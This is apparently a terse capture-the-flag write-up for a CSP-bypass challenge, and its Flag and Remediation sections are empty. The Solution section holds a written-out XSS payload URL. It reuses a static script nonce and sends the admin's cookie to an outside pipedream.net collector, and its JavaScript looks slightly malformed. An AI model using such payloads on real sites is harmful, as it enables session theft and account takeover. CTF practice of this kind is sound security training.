Difficulty:

Notes:

  • NONCE is static per deployment
  • queryParam name is not sanitized before

Rabbit Holes:

Solution:

Simple XSS Payload extracting the Cookie from the Admin. Nonce is static and can be hardcoded.

https://babier-csp.dicec.tf/?name=lemon <script nonce=LRGWAXOY98Es0zz0QOVmag==> location.window="http://enk6w2e573qoxoa.m.pipedream.net/%22+document.cookie+%22speckij";

Flag

Remediation: